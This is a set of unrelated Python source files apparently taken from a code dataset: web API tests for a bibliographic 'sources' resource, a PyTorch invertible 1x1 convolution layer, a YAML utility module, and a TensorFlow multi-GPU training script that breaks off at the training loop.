self.extra_environ_admin, status=400)
resp = json.loads(response.body)
source_count = new_source_count
new_source_count = Session.query(Source).count()
our_book_datetime_modified = Session.query(Source).get(book_id).datetime_modified
assert our_book_datetime_modified.isoformat() == datetime_modified
assert source_count == new_source_count
assert resp['error'] == u'The update request failed because the submitted data were not new.'
assert response.content_type == 'application/json'
# Update by adding a file to the source
file_ = h.generate_default_file()
Session.add(file_)
Session.commit()
file_id = file_.id
filename = file_.name
sleep(1) # sleep for a second to ensure that MySQL can register a different datetime_modified for the update
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57',
'author': u'<NAME>.',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957,
'file': file_id
})
params = json.dumps(params)
response = self.app.put(url('source', id=book_id), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
source_count = new_source_count
new_source_count = Session.query(Source).count()
new_datetime_modified = resp['datetime_modified']
assert new_datetime_modified != datetime_modified
assert source_count == new_source_count
assert resp['file']['name'] == filename
assert response.content_type == 'application/json'
@nottest
def test_delete(self):
"""Tests that DELETE /sources/id deletes the source with id=id."""
# Create a book to delete.
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57',
'author': u'<NAME>',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
source_count = Session.query(Source).count()
book_id = resp['id']
# Now delete the source
response = self.app.delete(url('source', id=book_id), headers=self.json_headers,
extra_environ=self.extra_environ_admin)
resp = json.loads(response.body)
new_source_count = Session.query(Source).count()
assert new_source_count == source_count - 1
assert resp['id'] == book_id
assert response.content_type == 'application/json'
# Trying to get the deleted source from the db should return None
deleted_source = Session.query(Source).get(book_id)
assert deleted_source == None
# Delete with an invalid id
id = 9999999999999
response = self.app.delete(url('source', id=id),
headers=self.json_headers, extra_environ=self.extra_environ_admin,
status=404)
assert u'There is no source with id %s' % id in json.loads(response.body)['error']
assert response.content_type == 'application/json'
# Delete without an id
response = self.app.delete(url('source', id=''), status=404,
headers=self.json_headers, extra_environ=self.extra_environ_admin)
assert json.loads(response.body)['error'] == 'The resource could not be found.'
assert response.content_type == 'application/json'
@nottest
def test_show(self):
"""Tests that GET /source/id returns the source with id=id or an appropriate error."""
# Create a book to show.
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57',
'author': u'<NAME>',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
book_id = resp['id']
# Try to get a source using an invalid id
id = 100000000000
response = self.app.get(url('source', id=id),
headers=self.json_headers, extra_environ=self.extra_environ_admin,
status=404)
resp = json.loads(response.body)
assert u'There is no source with id %s' % id in json.loads(response.body)['error']
assert response.content_type == 'application/json'
# No id
response = self.app.get(url('source', id=''), status=404,
headers=self.json_headers, extra_environ=self.extra_environ_admin)
assert json.loads(response.body)['error'] == 'The resource could not be found.'
assert response.content_type == 'application/json'
# Valid id
response = self.app.get(url('source', id=book_id), headers=self.json_headers,
extra_environ=self.extra_environ_admin)
resp = json.loads(response.body)
assert resp['author'] == u'<NAME>'
assert resp['year'] == 1957
assert response.content_type == 'application/json'
@nottest
def test_edit(self):
"""Tests that GET /sources/id/edit returns a JSON object of data necessary to edit the source with id=id.
The JSON object is of the form {'source': {...}, 'data': {...}} or
{'error': '...'} (with a 404 status code) depending on whether the id is
valid or invalid/unspecified, respectively.
"""
# Create a book to request edit on.
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57',
'author': u'<NAME>',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
book_id = resp['id']
# Not logged in: expect 401 Unauthorized
response = self.app.get(url('edit_source', id=book_id), status=401)
resp = json.loads(response.body)
assert resp['error'] == u'Authentication is required to access this resource.'
assert response.content_type == 'application/json'
# Invalid id
id = 9876544
response = self.app.get(url('edit_source', id=id),
headers=self.json_headers, extra_environ=self.extra_environ_admin,
status=404)
assert u'There is no source with id %s' % id in json.loads(response.body)['error']
assert response.content_type == 'application/json'
# No id
response = self.app.get(url('edit_source', id=''), status=404,
headers=self.json_headers, extra_environ=self.extra_environ_admin)
assert json.loads(response.body)['error'] == \
'The resource could not be found.'
# Valid id
response = self.app.get(url('edit_source', id=book_id),
headers=self.json_headers, extra_environ=self.extra_environ_admin)
resp = json.loads(response.body)
assert resp['source']['title'] == u'Syntactic Structures'
assert resp['data']['types'] == sorted(entry_types.keys())
assert response.content_type == 'application/json'
@nottest
def test_search(self):
"""Tests that SEARCH /sources (a.k.a. POST /sources/search) correctly returns an array of sources based on search criteria."""
# Create some sources (and other models) to search and add SEARCH to the list of allowable methods
_create_test_data(100)
self._add_SEARCH_to_web_test_valid_methods()
sources = json.loads(json.dumps(h.get_sources(True), cls=h.JSONOLDEncoder))
# Searching where values may be NULL
json_query = json.dumps({'query': {'filter': ['Source', 'publisher', '=', None]}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
result_set = [s for s in sources if not s['publisher']]
assert resp
assert len(resp) == len(result_set)
assert set([s['id'] for s in resp]) == set([s['id'] for s in result_set])
assert response.content_type == 'application/json'
json_query = json.dumps({'query': {'filter': ['Source', 'publisher', 'like', u'%P%']}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
result_set = [s for s in sources if s['publisher'] and u'P' in s['publisher']]
assert resp
assert len(resp) == len(result_set)
assert set([s['id'] for s in resp]) == set([s['id'] for s in result_set])
assert response.content_type == 'application/json'
# A fairly complex search
json_query = json.dumps({'query': {'filter': [
'and', [
['Source', 'type', 'in', [u'book', u'article']],
['not', ['Source', 'key', 'regex', u'[537]']],
['or', [
['Source', 'author', 'like', u'%A%'],
['Source', 'year', '>', 1994]]]]]}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
result_set = [s for s in sources if
s['type'] in ['book', 'article'] and
not re.search('[537]', s['key']) and
('A' in s['author'] or s['year'] > 1994)]
assert resp
assert len(resp) == len(result_set)
assert set([s['id'] for s in resp]) == set([s['id'] for s in result_set])
assert response.content_type == 'application/json'
# A basic search with a paginator provided.
json_query = json.dumps({'query': {
'filter': ['Source', 'title', 'like', '%3%']},
'paginator': {'page': 2, 'items_per_page': 5}})
response = self.app.request(url('sources'), method='SEARCH', body=json_query,
headers=self.json_headers, environ=self.extra_environ_admin)
resp = json.loads(response.body)
result_set = [s for s in sources if s['title'] and '3' in s['title']]
assert resp['paginator']['count'] == len(result_set)
assert len(resp['items']) == 5
assert resp['items'][0]['id'] == result_set[5]['id']
assert resp['items'][-1]['id'] == result_set[9]['id']
assert response.content_type == 'application/json'
# An invalid paginator (here 'page' is less than 1) will result in formencode.Invalid
# being raised resulting in a response with a 400 status code and a JSON error msg.
json_query = json.dumps({
'query': {
'filter': ['Source', 'title', 'like', '%3%']},
'paginator': {'page': 0, 'items_per_page': 10}})
response = self.app.request(url('sources'), method='SEARCH', body=json_query,
headers=self.json_headers, environ=self.extra_environ_admin, status=400)
resp = json.loads(response.body)
assert resp['errors']['page'] == u'Please enter a number that is 1 or greater'
assert response.content_type == 'application/json'
# Some "invalid" paginators will silently fail. For example, if there is
# no 'pages' key, then SEARCH /sources will just assume there is no paginator
# and all of the results will be returned.
json_query = json.dumps({
'query': {
'filter': ['Source', 'title', 'like', '%3%']},
'paginator': {'pages': 1, 'items_per_page': 10}})
response = self.app.request(url('sources'), method='SEARCH', body=json_query,
headers=self.json_headers, environ=self.extra_environ_admin)
resp = json.loads(response.body)
assert len(resp) == len([s for s in sources if s['title'] and '3' in s['title']])
# Adding a 'count' key to the paginator object in the request will spare
# the server from running query.count(). Note that the server will not
# attempt to verify the count (since that would defeat the purpose) but
# will simply pass it back. The server trusts that the client is passing
# in a factual count. Here we pass in an inaccurate count for demonstration.
json_query = json.dumps({'query': {
'filter': ['Source', 'title', 'like', '%3%']},
'paginator': {'page': 2, 'items_per_page': 4, 'count': 750}})
response = self.app.request(url('sources'), method='SEARCH', body=json_query,
headers=self.json_headers, environ=self.extra_environ_admin)
resp = json.loads(response.body)
assert resp['paginator']['count'] == 750
assert len(resp['items']) == 4
assert resp['items'][0]['id'] == result_set[4]['id']
assert resp['items'][-1]['id'] == result_set[7]['id']
# Test order by: order by title descending
json_query = json.dumps({'query': {
'filter': ['Source', 'key', 'regex', '.'],
'order_by': ['Source', 'title', 'desc']}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
result_set = sorted(sources, key=lambda k: k['title'], reverse=True)
assert len(resp) == 100
assert [s['title'] for s in result_set] == [s['title'] for s in resp]
assert resp[-1]['title'] == None
assert resp[0]['title'] == u'Title 90'
assert response.content_type == 'application/json'
# order by with missing direction defaults to 'asc'
json_query = json.dumps({'query': {
'filter': ['Source', 'key', 'regex', '.'],
'order_by': ['Source', 'title']}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
assert len(resp) == 100
assert resp[-1]['title'] == u'Title 90'
assert resp[0]['title'] == None
# order by with unknown direction defaults to 'asc'
json_query = json.dumps({'query': {
'filter': ['Source', 'key', 'regex', '.'],
'order_by': ['Source', 'title', 'descending']}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
assert len(resp) == 100
assert resp[-1]['title'] == u'Title 90'
assert resp[0]['title'] == None
# syntactically malformed order by
json_query = json.dumps({'query': {
'filter': ['Source', 'key', 'regex', '.'],
'order_by': ['Source']}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin, status=400)
resp = json.loads(response.body)
assert resp['errors']['OrderByError'] == u'The provided order by expression was invalid.'
assert response.content_type == 'application/json'
# searches with lexically malformed order bys
json_query = json.dumps({'query': {
'filter': ['Source', 'key', 'regex', '.'],
'order_by': ['Source', 'foo', 'desc']}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin, status=400)
resp = json.loads(response.body)
assert resp['errors']['Source.foo'] == u'Searching on Source.foo is not permitted'
assert resp['errors']['OrderByError'] == u'The provided order by expression was invalid.'
assert response.content_type == 'application/json'
json_query = json.dumps({'query': {
'filter': ['Source', 'key', 'regex', '.'],
'order_by': ['Foo', 'id', 'desc']}})
response = self.app.post(url('/sources/search'), json_query,
self.json_headers, self.extra_environ_admin, status=400)
resp = json.loads(response.body)
assert resp['errors']['Foo'] == u'Searching the Source model by joining on the Foo model is not possible'
assert resp['errors']['Foo.id'] == u'Searching on Foo.id is not permitted'
assert resp['errors']['OrderByError'] == u'The provided order by expression was invalid.'
assert response.content_type == 'application/json'
@nottest
def test_new_search(self):
"""Tests that GET /sources/new_search returns the search parameters for searching the sources resource."""
query_builder = SQLAQueryBuilder('Source')
response = self.app.get(url('/sources/new_search'), headers=self.json_headers,
extra_environ=self.extra_environ_view)
resp = json.loads(response.body)
assert resp['search_parameters'] == h.get_search_parameters(query_builder)
| StarcoderdataPython |
1806971 | import numpy as np
import torch
from torch import nn as nn
from torch.nn import functional as F
from . import thops
class InvertibleConv1x1(nn.Module):
def __init__(self, num_channels, LU_decomposed=False):
super().__init__()
w_shape = [num_channels, num_channels]
w_init = np.linalg.qr(np.random.randn(*w_shape))[0].astype(np.float32)
self.register_parameter("weight", nn.Parameter(torch.Tensor(w_init)))
self.w_shape = w_shape
self.LU = LU_decomposed
def get_weight(self, input, reverse):
w_shape = self.w_shape
pixels = thops.pixels(input)
dlogdet = torch.slogdet(self.weight)[1] * pixels
if not reverse:
weight = self.weight.view(w_shape[0], w_shape[1], 1, 1)
else:
weight = torch.inverse(self.weight.double()).float() \
.view(w_shape[0], w_shape[1], 1, 1)
return weight, dlogdet
def forward(self, input, logdet=None, reverse=False):
"""
log-det = log|abs(|W|)| * pixels
"""
weight, dlogdet = self.get_weight(input, reverse)
if not reverse:
z = F.conv2d(input, weight)
if logdet is not None:
logdet = logdet + dlogdet
return z, logdet
else:
z = F.conv2d(input, weight)
if logdet is not None:
logdet = logdet - dlogdet
return z, logdet
| StarcoderdataPython |
4970310 | # Copyright 2017-2022 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
import os
import re
import yaml
def encode_yaml(val, default_flow_style=False):
encoded = yaml.safe_dump(val, default_flow_style=default_flow_style, indent=2)
return _strip_encoded_yaml(encoded)
def _strip_encoded_yaml(encoded):
stripped = encoded.strip()
if stripped.endswith("\n..."):
stripped = stripped[:-4]
return stripped
def decode_yaml(s):
try:
return yaml.safe_load(s)
except yaml.scanner.ScannerError as e:
raise ValueError(e)
def yaml_front_matter(filename):
fm_s = _yaml_front_matter_s(filename)
if not fm_s:
return {}
return yaml.safe_load(fm_s)
def _yaml_front_matter_s(filename):
lines = []
reading = False
with open(filename) as f:
for line in f:
trimmed = line.rstrip()
if not trimmed.lstrip():
continue
if trimmed == "---":
if reading:
return "\n".join(lines)
else:
reading = True
elif reading:
lines.append(trimmed)
else:
return None
def patch_yaml_resolver():
"""Patch yaml parsing to support Guild specific resolution rules.
- Make '+' or '-' optional in scientific notation
- Make use of decimal '.' optional in scientific notation
This patch replaces the default 'tag:yaml.org,2002:float' resolver
with an augmented set of regex patterns. Refer to
`yaml/resolver.py` for the original patterns.
"""
yaml.resolver.Resolver.add_implicit_resolver(
u'tag:yaml.org,2002:float',
# The patterns below are modified from the original set in two
# ways: the first pattern makes `[-+]` optional and the second
# pattern is a new pattern to match scientific notation that
# does not include a decimal (e.g. `1e2`).
re.compile(
r"""^(?:[-+]?(?:[0-9][0-9_]*)\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\.[0-9_]*
|[-+]?\.(?:inf|Inf|INF)
|\.(?:nan|NaN|NAN))$""",
re.X,
),
list(u'-+0123456789.'),
)
if os.getenv("NO_PATCH_YAML") != "1":
patch_yaml_resolver()
| StarcoderdataPython |
8196303 | <gh_stars>0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from datetime import datetime
import os, pickle
import re
import time
import importlib
import sys
import numpy as np
import tensorflow as tf
import batching
import tensorflow.contrib.slim as slim
from tensorflow.python.framework import ops
from tensorflow.python.client import timeline
import util
# populate the --data_dir flag
import dataset
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('train_dir', '/tmp/imagenet_train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 10000000,
"""Number of batches to run.""")
tf.app.flags.DEFINE_string('subset', 'train',
"""Either 'train' or 'validation'.""")
# Flags governing the hardware employed for running TensorFlow.
tf.app.flags.DEFINE_integer('num_gpus', 1,
"""How many gpus to use on the system"""
"""Should be used with CUDA_VISIBLE_DEVICES""")
tf.app.flags.DEFINE_boolean('background_class', True,
"""Whether to reserve 0 as background.""")
tf.app.flags.DEFINE_boolean('log_device_placement', False,
"""Whether to log device placement.""")
tf.app.flags.DEFINE_integer('training_step_offset', 0,
"""Subtract offset from global step when calculate
learning rate.
It is useful for fine tuning a network.""")
# Yang: delete the fine tuning option here
tf.app.flags.DEFINE_string('pretrained_model_checkpoint_path', '',
"""If specified, restore this pretrained model """
"""before beginning any training.""")
# Yang: add flags to data provider and model definitions
tf.app.flags.DEFINE_string('data_provider', '',
"""The data reader class, which is located """
"""under the folder ./data_providers/ """)
tf.app.flags.DEFINE_string('model_definition', '',
"""The data reader class, located at ./models/""")
model = importlib.import_module("models.%s" % FLAGS.model_definition)
dataset_module = importlib.import_module("data_providers.%s" % FLAGS.data_provider)
tf.app.flags.DEFINE_boolean('profile', False,
"""Whether to profile using time line object.""")
tf.app.flags.DEFINE_float('clip_gradient_threshold', -1.0,
"""If the gradient is larger than this value, then clip it.
Only valid when > 0""")
tf.app.flags.DEFINE_float('initial_learning_rate', 0.1,
"""Initial learning rate.""")
tf.app.flags.DEFINE_float('num_epochs_per_decay', 30.0,
"""Epochs after which learning rate decays.""")
tf.app.flags.DEFINE_float('learning_rate_decay_factor', 0.16,
"""Learning rate decay factor.""")
# add a flag to switch optimizer
tf.app.flags.DEFINE_string('optimizer', 'sgd',
'''Select which optimizer to use. Currently'''
'''available optimizers are sgd and rmsprop''')
# Constants dictating the learning rate schedule.
RMSPROP_DECAY = 0.9 # Decay term for RMSProp.
RMSPROP_EPSILON = 1.0 # Epsilon term for RMSProp.
tf.app.flags.DEFINE_float('momentum', 0.9,
"""Momentum for SGD or RMSProp.""")
# add display interval flags
tf.app.flags.DEFINE_integer('display_loss', 10,
'''display loss info per this batch''')
tf.app.flags.DEFINE_integer('display_summary', 100,
'''display tensorboard summary per this batch''')
tf.app.flags.DEFINE_integer('checkpoint_interval', 5000,
'''checkpoint per this batch''')
tf.app.flags.DEFINE_string('EWC', 'off',
'''Elastic Weight Consolidation method status: off, stat, apply''')
def _tower_loss(inputs, outputs, num_classes, scope):
# inputs and outputs are two lists of tensors
"""Calculate the total loss on a single tower running the CNN model.
We perform 'batch splitting'. This means that we cut up a batch across
multiple GPU's. For instance, if the batch size = 32 and num_gpus = 2,
then each tower will operate on an batch of 16 images.
Args:
images: Images. 4D tensor of size [batch_size, FLAGS.image_size,
FLAGS.image_size, 3].
labels: Tensor of labels. Shape could be different for each task.
Classification: 1-D integer Tensor of [batch_size].
Detection: list of batch_size Tensors where each of them being
a tuple of ([num_boxes, 4], [num_boxes]) denoting the box coordinates
and the labels for each box
Segmentation: a Tensor of [batch_size, image_sz, image_sz]
num_classes: number of classes
scope: unique prefix string identifying the ImageNet tower, e.g.
'tower_0'.
Returns:
Tensor of shape [] containing the total loss for a batch of data
"""
# Build inference Graph.
logits = model.inference(inputs, num_classes, for_training=True, scope=scope)
# Build the portion of the Graph calculating the losses. Note that we will
# assemble the total_loss using a custom function below.
split_batch_size = inputs[0].get_shape().as_list()[0]
model.loss(logits, outputs, batch_size=split_batch_size)
# Assemble all of the losses for the current tower only.
#losses = tf.get_collection(slim.losses.LOSSES_COLLECTION, scope)
losses = slim.losses.get_losses(scope)
# Calculate the total loss for the current tower.
regularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
total_loss = tf.add_n(losses + regularization_losses, name='total_loss')
# Compute the moving average of all individual losses and the total loss.
loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
loss_averages_op = loss_averages.apply(losses + [total_loss])
# Attach a scalar summmary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
# Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
# session. This helps the clarity of presentation on TensorBoard.
loss_name = re.sub('%s_[0-9]*/' % model.TOWER_NAME, '', l.op.name)
# Name each loss as '(raw)' and name the moving average version of the loss
# as the original loss name.
tf.scalar_summary(loss_name +' (raw)', l)
tf.scalar_summary(loss_name +' (ave)', loss_averages.average(l))
with tf.control_dependencies([loss_averages_op]):
total_loss = tf.identity(total_loss)
return total_loss
def _average_gradients(tower_grads, include_square=False):
"""Calculate the average gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer list
is over individual gradients. The inner list is over the gradient
calculation for each tower.
Returns:
List of pairs of (gradient, variable) where the gradient has been averaged
across all towers.
"""
average_grads = []
average_grads_square = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
none_count = 0
for g, v in grad_and_vars:
if g == None:
none_count = none_count + 1
continue
# Add 0 dimension to the gradients to represent the tower.
expanded_g = tf.expand_dims(g, 0)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
if none_count==0:
# Average over the 'tower' dimension.
grad_cat = tf.concat(0, grads)
grad = tf.reduce_mean(grad_cat, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
if include_square:
grad2 = tf.mul(grad_cat, grad_cat, name="square_gradient")
grad2 = tf.reduce_mean(grad2, 0)
average_grads_square.append((grad2, v))
elif none_count == len(grad_and_vars):
print("None gradient for %s" % (grad_and_vars[0][1].op.name))
else:
raise ValueError("None gradient error")
if include_square:
return average_grads, average_grads_square
else:
return average_grads
def _tensor_list_splits(tensor_list, nsplit):
# output is nsplit lists, where each one is a list of those tensors
out = [[] for _ in range(nsplit)]
# this has T tensors
for tensor in tensor_list:
# this has N splits
sp = tf.split(0, nsplit, tensor)
for i, split_item in enumerate(sp):
out[i].append(split_item)
return out
def train():
dataset = dataset_module.MyDataset(subset=FLAGS.subset)
#assert dataset.data_files()
"""Train on dataset for a number of steps."""
# use gpu:0 instead of cpu0, to avoid RNN GPU variable uninitialized problem
with tf.Graph().as_default(), tf.device('/gpu:0'):
# Create a variable to count the number of train() calls. This equals the
# number of batches processed * FLAGS.num_gpus.
global_step = tf.get_variable(
'global_step', [],
initializer=tf.constant_initializer(0), trainable=False)
# Calculate the learning rate schedule.
num_batches_per_epoch = (dataset.num_examples_per_epoch() /
FLAGS.batch_size)
decay_steps = int(num_batches_per_epoch * FLAGS.num_epochs_per_decay)
lr = tf.train.exponential_decay(FLAGS.initial_learning_rate,
global_step-FLAGS.training_step_offset,
decay_steps,
FLAGS.learning_rate_decay_factor,
staircase=True)
# Create an optimizer that performs gradient descent.
if FLAGS.optimizer == "rmsprop":
opt = tf.train.RMSPropOptimizer(lr, decay=RMSPROP_DECAY,
momentum=FLAGS.momentum,
epsilon=RMSPROP_EPSILON)
elif FLAGS.optimizer == "sgd":
opt = tf.train.MomentumOptimizer(lr, FLAGS.momentum,
use_nesterov=False)
elif FLAGS.optimizer == "adadelta":
opt = tf.train.AdadeltaOptimizer()
elif FLAGS.optimizer == "adam":
opt = tf.train.AdamOptimizer()
else:
print("optimizer invalid: %s" % FLAGS.optimizer)
return
# Get images and labels for ImageNet and split the batch across GPUs.
assert FLAGS.batch_size % FLAGS.num_gpus == 0, (
'Batch size must be divisible by number of GPUs')
split_batch_size = int(FLAGS.batch_size / FLAGS.num_gpus)
# Override the number of preprocessing threads to account for the increased
# number of GPU towers.
#num_preprocess_threads = FLAGS.num_preprocess_threads * FLAGS.num_gpus
# choose not to overide, to have a finer control of how many threads to use
num_preprocess_threads = FLAGS.num_preprocess_threads
net_inputs, net_outputs = batching.distorted_inputs(
dataset,
num_preprocess_threads=num_preprocess_threads)
input_summaries = copy.copy(tf.get_collection(tf.GraphKeys.SUMMARIES))
init_op = tf.initialize_all_variables()
# Number of classes in the Dataset label set plus 1.
# Label 0 is reserved for an (unused) background class.
if FLAGS.background_class:
num_classes = dataset.num_classes() + 1
else:
num_classes = dataset.num_classes()
# Split the batch of images and labels for towers.
# TODO: this might become invalid if we are doing detection
input_splits = _tensor_list_splits(net_inputs, FLAGS.num_gpus)
output_splits = _tensor_list_splits(net_outputs, FLAGS.num_gpus)
# Calculate the gradients for each model tower.
tower_grads = []
for i in xrange(FLAGS.num_gpus):
with tf.device('/gpu:%s' % i):
with tf.name_scope('%s_%d' % (model.TOWER_NAME, i)) as scope:
if True:
# I don't see any improvements by pinning all variables on CPU, so I disabled this
# Force all Variables to reside on the CPU.
#with slim.arg_scope([slim.variable], device='/cpu:0'):
# do not use this line, as it will assign all operations to cpu
#with tf.device('/cpu:0'):
# Calculate the loss for one tower of the CNN model. This
# function constructs the entire CNN model but shares the
# variables across all towers.
loss = _tower_loss(input_splits[i], output_splits[i], num_classes,
scope)
if i==0:
# set different learning rates for different variables
if hasattr(model, 'learning_rate_multipliers'):
# this function returns a dictionary of [varname]=multiplier
# learning rate multiplier that equals to one is set by default
multiplier = model.learning_rate_multipliers()
# computing the vars that needs gradient
grad_var_list = []
for t in tf.trainable_variables():
v = t.op.name
if (v in multiplier) and (abs(multiplier[v]) < 1e-6):
pass
else:
grad_var_list.append(t)
print("-"*40 + "\n gradient will be computed for vars:")
for x in grad_var_list:
print(x.op.name)
else:
multiplier = None
grad_var_list = None
# Reuse variables for the next tower.
tf.get_variable_scope().reuse_variables()
# Retain the summaries from the final tower.
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)
# Retain the Batch Normalization updates operations only from the
# final tower. Ideally, we should grab the updates from all towers
# but these stats accumulate extremely fast so we can ignore the
# other stats from the other towers without significant detriment.
batchnorm_updates = tf.get_collection(ops.GraphKeys.UPDATE_OPS, scope)
#batchnorm_updates = tf.get_collection(slim.ops.UPDATE_OPS_COLLECTION,
# scope)
# Calculate the gradients for the batch of data on this CNN
# tower.
grads = opt.compute_gradients(loss, var_list=grad_var_list)
# Keep track of the gradients across all towers.
tower_grads.append(grads)
# We must calculate the mean of each gradient. Note that this is the
# synchronization point across all towers.
if FLAGS.EWC == "stat":
grads, grads2 = _average_gradients(tower_grads, True)
# merge grads2 into a dict of variable
out = {}
vard = {}
for g2, v in grads2:
out[v.op.name] = g2
vard[v.op.name] = v
grads2 = out
else:
grads = _average_gradients(tower_grads)
# Add a summaries for the input processing and global_step.
summaries.extend(input_summaries)
# Add a summary to track the learning rate.
summaries.append(tf.scalar_summary('learning_rate', lr))
# Add histograms for gradients.
for grad, var in grads:
if grad is not None:
summaries.append(
tf.histogram_summary(var.op.name + '/gradients', grad))
if multiplier:
print("-" * 40 + "\nusing learning rate multipliers")
grads_out=[]
for g, v in grads:
v_name = v.op.name
if v_name in multiplier:
g_out=tf.mul(multiplier[v_name], g)
print(v_name, " * ", multiplier[v_name])
else:
g_out=g
print(v_name, " * 1.00")
grads_out.append((g_out, v))
grads = grads_out
# gradient clipping
if FLAGS.clip_gradient_threshold > 0:
print("-"*40 + "\n Gradient Clipping On")
t_list = [x[0] for x in grads]
t_list, gnorm = tf.clip_by_global_norm(
t_list,
FLAGS.clip_gradient_threshold,
name='gradient_clipping')
grads = [(t_list[i], grads[i][1]) for i in range(len(t_list))]
# Apply the gradients to adjust the shared variables.
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
# Add histograms for trainable variables.
for var in tf.trainable_variables():
summaries.append(tf.histogram_summary(var.op.name, var))
# Track the moving averages of all trainable variables.
# Note that we maintain a "double-average" of the BatchNormalization
# global statistics. This is more complicated then need be but we employ
# this for backward-compatibility with our previous models.
variable_averages = tf.train.ExponentialMovingAverage(
model.MOVING_AVERAGE_DECAY, global_step)
# Another possiblility is to use tf.slim.get_variables().
variables_to_average = (tf.trainable_variables() +
tf.moving_average_variables())
variables_averages_op = variable_averages.apply(variables_to_average)
# Group all updates to into a single train op.
batchnorm_updates_op = tf.group(*batchnorm_updates)
train_op = tf.group(apply_gradient_op, variables_averages_op,
batchnorm_updates_op)
# Create a saver.
saver = tf.train.Saver(tf.all_variables())
# Build the summary operation from the last tower summaries.
summary_op = tf.merge_summary(summaries)
# some variables allocated for the accumulators
if FLAGS.EWC == "stat":
grads2_accu = {}
accu_ops = {}
with tf.device('/gpu:0'):
for key in grads2.keys():
shape = [x.value for x in grads2[key].get_shape()]
grads2_accu[key] = tf.Variable(initial_value=np.zeros(shape, dtype=np.float32),
trainable=False,
name=key+"_accumulator")
accu_ops[key] = tf.assign_add(grads2_accu[key], grads2[key], name=key+"_assign_add")
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph. allow_soft_placement must be set to
# True to build towers on GPU, as some of the ops do not have GPU
# implementations.
config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=FLAGS.log_device_placement,
intra_op_parallelism_threads=1)
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
sess.run(init)
# TODO: not supported to load from different number of towers now
if FLAGS.pretrained_model_checkpoint_path:
assert tf.gfile.Exists(FLAGS.pretrained_model_checkpoint_path)
#variables_to_restore = tf.get_collection(slim.variables.VARIABLES_TO_RESTORE)
variables_to_restore = slim.get_variables_to_restore()
# only restore those that are in the checkpoint
existing_vars = util.tensors_in_checkpoint_file(FLAGS.pretrained_model_checkpoint_path)
restore_new = []
ignore_vars = []
for x in variables_to_restore:
if x.op.name in existing_vars:
restore_new.append(x)
else:
ignore_vars.append(x.op.name)
if len(ignore_vars)>0:
print("-"*40+"\nWarning: Some variables does not exists in the checkpoint, ignore them: ")
for x in ignore_vars:
print(x)
variables_to_restore = restore_new
restorer = tf.train.Saver(variables_to_restore)
restorer.restore(sess, FLAGS.pretrained_model_checkpoint_path)
print('%s: Pre-trained model restored from %s' %
(datetime.now(), FLAGS.pretrained_model_checkpoint_path))
# Start the queue runners.
tf.train.start_queue_runners(sess=sess)
summary_writer = tf.train.SummaryWriter(
FLAGS.train_dir,
graph_def=sess.graph.as_graph_def(add_shapes=True))
start_time = time.time()
duration_compute=0
grads2_count = 0
step_start = int(sess.run(global_step))
try:
for step in xrange(step_start, FLAGS.max_steps):
